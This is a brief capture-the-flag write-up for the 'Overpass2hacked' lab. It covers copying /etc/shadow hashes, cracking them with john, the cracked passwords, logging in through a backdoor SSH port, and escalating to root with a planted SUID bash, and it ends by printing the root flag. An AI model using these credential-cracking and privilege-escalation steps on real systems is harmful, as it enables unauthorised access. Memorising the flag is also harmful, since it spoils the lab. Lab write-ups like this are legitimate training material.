Overpass2hacked

Examine capture file Copy hashes from /etc/shadow for offline cracking with fasttrack.txt in john ound 4 passwords • secret12 (bee) • abcd123 (szymex) • 1qaz2wsx (muirland) secuirty3 (paradox)

Initial access

The hacker left a backdoor on SSH port 2222 Username: james Password:november16

Enumeration

Got kernel version

uname -a

search for Linux Kernel 4.15 exploits

$ searchsploit linux 4.15

Look around the file system

Abusing .suid_bash

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt
thm{d53b2684f169360bb9606c333873144d}

root flag thm{d53b2684f169360bb9606c333873144d}